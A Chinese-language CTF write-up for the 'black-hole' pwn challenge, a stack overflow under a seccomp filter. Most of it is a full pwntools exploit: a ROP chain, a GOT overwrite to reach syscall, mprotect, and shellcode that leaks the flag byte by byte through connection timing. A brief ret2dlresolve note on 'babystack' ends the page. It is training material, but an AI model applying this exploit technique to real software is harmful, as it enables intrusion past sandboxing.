black-hole
In memory of Stephen Hawking
题目的内容非常的简单,就是在stack overflow的函数前面加上了seccomp的约束。
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
init_seccomp();
bo();
return 0LL;
}
seccomp里面调用的是函数seccomp_rule_add_exact这个函数是过滤一些系统调用的,第三个参数是过滤的syscall number,第二个参数是决定怎么去过滤这些syscall numbers的。这里的第二个参数是0x7fff0000,表示的是SECCOMP_RET_ALLOW,可以使用的调用号就只有那几个0 2 3 10 60 231
- read
- open
- close
- mprotect
- exit
- exit_group
这里面没有任何的输出函数。那么就算我们读了flag也没有输出,更加没法去leak。那么怎么办呢?让人注意的只有mprotect这个syscall,我们似乎可以用shellcode来完成所有的事情。
从修改alarm成为syscall,到读取一个字节,然后和flag进行比较,可以一气呵成。这个题目实际上和去年defcon中的一个盲比较的题目很像,都是通过链接有没有断掉来判断是否比较成功了的。
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
binary = './blackhole'
elf = ELF(binary)
libc = elf.libc
io = process(binary)
context.log_level = 'debug'
pause()
def call_func(r12, r15, r14, r13):
buf = p64(0x400a4a)
buf += p64(0) # rbx
buf += p64(1) # rbp
buf += p64(r12) # func name
buf += p64(r13) # rdx
buf += p64(r14) # rsi
buf += p64(r15) # rdi
buf += p64(0x400a30)
buf += '0' * 56
return buf
# prepare big rop chain, because the previous overflow size is not enough for all the
# operations
bss_addr = 0x601a00
pop_rbp = 0x4007c0
leave_ret = 0x4009a5
b = 'a' * 0x20
b += 'b' * 8
b += call_func(elf.got['read'], 0, bss_addr, 0x300)
b += p64(pop_rbp)
b += p64(bss_addr)
b += p64(leave_ret)
io.send(b)
# read ROP to it
pause()
bss_addr2 = 0x601d00
context.arch = 'amd64'
b = '''
mov rax, 2
mov rdi, 0x601b78
mov rsi, 0
mov rdx, 0
syscall
xchg rax, rdi
xor rax, rax
mov rsi, 0x601600
mov rdx, 60
syscall
mov rcx, 0x601600
add rcx, %d
mov al, byte ptr [rcx]
cmp al, %d
jge good
bad:
mov rax, 60
syscall
good:
mov rax, 0
mov rdi, 0
mov rsi, 0x601500
mov rdx, 0x100
syscall
jmp good
'''
offset = 0
cmpval = ord('c')
SC = asm(b % (offset, cmpval))
b = p64(0) # for pop ebp in leave
b += call_func(elf.got['read'], 0, elf.got['alarm'], 1) # set the elf.got['alarm'] to syscall
b += call_func(elf.got['read'], 0, bss_addr2, 10) # set rax 10
b += call_func(elf.got['alarm'], 0x601000, 1000, 7) # mprotect()
b += p64(bss_addr + 0x200)
b += 'flag\x00'
b = b.ljust(0x200, '\x00')
b += SC
io.send(b)
# read one byte to the got
pause()
io.send('\x05')
# read 10 bytes to set the rax
pause()
io.send('1' * 10)
io.interactive()
babystack
这个就不多说了,ret2dlresolve,网上相关的资料太多了。
